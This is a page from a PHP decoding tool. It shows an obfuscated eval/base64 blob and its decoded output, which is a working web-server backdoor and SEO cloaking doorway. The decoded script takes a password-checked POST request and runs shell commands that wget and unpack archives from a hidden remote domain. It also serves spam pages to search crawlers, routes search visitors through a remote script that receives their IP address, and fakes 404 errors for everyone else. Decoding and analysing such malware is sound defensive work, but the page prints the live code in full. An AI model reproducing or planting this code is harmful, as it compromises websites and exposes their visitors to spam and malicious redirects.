Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(strrev(';))"=oQD9lQCK0QfJkQCK0wOpwmc1J3YkgCbyV3YflnYfV2ZhB3X0V2Zg8GajVWCJkQCK0wOddSSS..

Decoded Output download


set_time_limit(0);

function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
		$ch = curl_init ();
		curl_setopt ($ch, CURLOPT_URL,$url);
		curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
		curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
		$result = curl_exec ($ch);
		curl_close($ch);
		return $result;
}

		$doorcontent="";
		$x=@$_POST["pppp_check"];
		$md5pass="e5e4570182820af0a183ce1520afe43b";

		$host=@$_SERVER["HTTP_HOST"];
		$uri=@$_SERVER["REQUEST_URI"];
		$host=str_replace("www.","",$host);
		$md5host=md5($host);
		$urx=$host.$uri;
		$md5urx=md5($urx);

		if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){	$tmppath = (dirname(__FILE__));	}	} else { $tmppath = (dirname(__FILE__));}

		$cdir=$tmppath."/.".$md5host."/";
		

		
		$domain=base64_decode("eDMubWVnYWxvbGlrLmNvbQ==");

		if ($x!=""){
			$p=md5(base64_decode(@$_POST["p"]));
			if ($p!=$md5pass)return;

			if (($x=="2")||($x=="4")){
				echo "###UPDATING_FILES###
";
				if ($x=="2"){
					$cmd="cd $tmppath; rm -rf .$md5host";
					echo shell_exec($cmd);
				}
				$cmd="cd $tmppath; wget http://$domain/outp/wp/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
				echo shell_exec($cmd);
				exit;
			}
			if ($x=="3"){
				echo "###WORKED###
";exit;
			}
		}else{
			$curx=$cdir.$md5urx;
			if (@file_exists($curx)){
				@list($IDpack,$mk,$doorcontent)=@explode("|||",base64_decode(@file_get_contents($curx)));
				$bot=0;
				$se=0;
				$mobile=0;
				if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
				if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
				if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
				if ($bot) {echo $doorcontent;exit;}
				if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk=".rawurlencode($mk)."&d=".$md5host."&u=".$md5urx."&addr=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;}

				header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
				echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "
";
				echo '<html><head>' . "
";
				echo '<title>404 Not Found</title>' . "
";
				echo '</head><body>' . "
";
				echo '<h1>Not Found</h1>' . "
";
				echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "
";
				echo '<hr>' . "
";
				echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "
";
				echo '</body></html>';
				exit;
			}else{
				$crurl="http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
				echo get_page_by_curl($crurl);
			}
		}

Did this file decode correctly?

Original Code

eval(strrev(';))"=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"(edoced_46esab(lave'));

Function Calls

strrev 1
base64_decode 1

Variables

None

Stats

MD5 91e40fc45c43fc3ef1e6086bed77cabd
Eval Count 2
Decode Time 81 ms